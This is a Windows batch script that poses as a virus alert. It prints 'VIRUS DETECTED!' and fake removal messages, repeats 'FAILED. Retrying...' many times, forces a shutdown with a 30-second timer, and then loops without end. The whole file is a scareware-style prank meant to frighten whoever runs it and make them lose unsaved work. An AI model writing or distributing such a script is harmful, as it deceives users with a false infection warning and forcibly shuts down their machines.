@echo off
title VIRUS
color 0a
cls
echo VIRUS DETECTED!
echo Windows is attempting to remove virus...
echo ..
echo ..
echo ..
echo ..
echo ..
echo Failed. Retrying...
pause
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
echo FAILED. Retrying...
shutdown -s -f -t 30 -c "Virus Removal Failed"
:repeat
echo Failed to remove virus. Retrying...
goto repeat
